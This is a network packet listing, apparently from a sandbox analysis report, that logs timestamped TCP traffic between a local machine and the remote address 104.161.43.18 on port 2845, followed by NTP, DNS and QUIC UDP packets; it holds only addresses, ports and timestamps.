                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529004097 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529139042 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529150009 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529160976 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529171944 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529181957 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529181957 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529192924 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529201031 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529203892 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529220104 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.529246092 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530095100 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530107021 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530117035 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530128956 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530138016 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530138969 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530148983 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530159950 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530169964 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530174971 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530201912 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530937910 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530960083 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.530972958 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531023979 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531028986 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531039953 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531049967 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531069994 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531085968 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531090975 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531186104 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531936884 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531949043 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531959057 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.531971931 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532006979 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532006979 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532468081 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532479048 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532489061 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532500029 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532510996 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532521009 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532521963 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532531977 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532541037 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.532562017 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533457994 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533468962 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533478975 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533490896 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533500910 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533510923 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533520937 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533524990 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533531904 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533555984 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.533565044 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534420967 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534432888 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534442902 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534452915 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534462929 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534462929 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534473896 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534482002 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534483910 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534495115 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534509897 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.534527063 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535238981 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535250902 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535269022 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535279036 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535290956 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535298109 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535325050 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535327911 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535332918 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535339117 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535350084 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.535386086 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.536201954 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.536212921 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.536375999 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597131014 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597227097 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597239017 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597284079 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597352028 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597384930 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597388983 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597625017 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597718000 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597728968 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.597775936 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.598592043 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.598732948 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.598745108 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.598756075 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.598769903 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.598773003 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.598810911 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599225998 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599237919 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599251032 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599261999 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599287987 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599683046 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599693060 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599725008 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599813938 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599824905 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599839926 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599848986 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599862099 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.599879980 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718184948 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718226910 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718239069 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718297958 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718435049 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718457937 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718468904 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718477964 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718511105 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718910933 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718928099 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718941927 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.718976974 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719230890 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719242096 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719253063 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719265938 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719294071 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719638109 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719681025 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719731092 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719743013 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719753981 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719767094 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719778061 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719779015 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719791889 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719815016 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.719825029 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720460892 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720621109 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720637083 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720694065 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720865965 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720877886 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720889091 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720907927 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720983982 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.720983982 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721503973 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721518040 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721529007 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721539974 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721550941 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721556902 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721563101 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721564054 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721582890 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.721604109 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722472906 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722486019 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722496986 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722508907 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722523928 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722543955 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722897053 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722908974 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722920895 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722932100 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722945929 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722961903 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.722973108 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:24.723006010 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:25.167325020 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:25.167397976 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:25.635251999 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:25.648217916 CET499152845192.168.2.7104.161.43.18
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:25.758100033 CET284549915104.161.43.18192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:42:25.770486116 CET284549915104.161.43.18192.168.2.7

                                                                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:16.817965031 CET123123192.168.2.740.81.94.65
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:17.403609037 CET12312340.81.94.65192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.060597897 CET5957753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:18.197990894 CET53595771.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.778790951 CET6107053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:21.916085005 CET53610701.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.564604998 CET5430553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:24.850526094 CET53543051.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:32.426443100 CET4951053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:32.735167027 CET53495101.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.319628000 CET5265453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.319983959 CET5527153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.457056999 CET53552711.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:33.457144976 CET53526541.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:35.739706039 CET6409053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:35.740097046 CET6145153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.167330027 CET5102053192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.205168009 CET5442853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.205418110 CET5143853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.498773098 CET53544281.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.498795986 CET53510201.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.505466938 CET5893253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.507124901 CET6164553192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.508068085 CET5476253192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.508368015 CET5653953192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.523088932 CET53514381.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.556133032 CET5828753192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.556305885 CET5210353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.642210960 CET53589321.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.643913984 CET53616451.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.644848108 CET53565391.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.644932985 CET53547621.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.692516088 CET53582871.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:36.692801952 CET53521031.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:37.395941019 CET6252453192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:37.396233082 CET6002153192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:37.533379078 CET53625241.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:37.534471989 CET53600211.1.1.1192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:38.552886963 CET52466443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:38.678802013 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:38.856172085 CET52466443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:38.982717991 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.537832975 CET52466443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.587960005 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.637696981 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.637849092 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.637860060 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.637981892 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.769402981 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.770299911 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.770531893 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.770575047 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.772476912 CET52466443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.773108959 CET52466443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.777740002 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.778518915 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.779819012 CET52466443192.168.2.7162.159.61.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.781863928 CET62406443192.168.2.7172.64.41.3
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.851468086 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:39.902400970 CET44362406172.64.41.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.086937904 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.087034941 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.087045908 CET44352466162.159.61.3192.168.2.7
                                                                                                                                                                                                                                                                                                      Dec 10, 2024 18:41:40.087054968 CET44352466162.159.61.3192.168.2.7
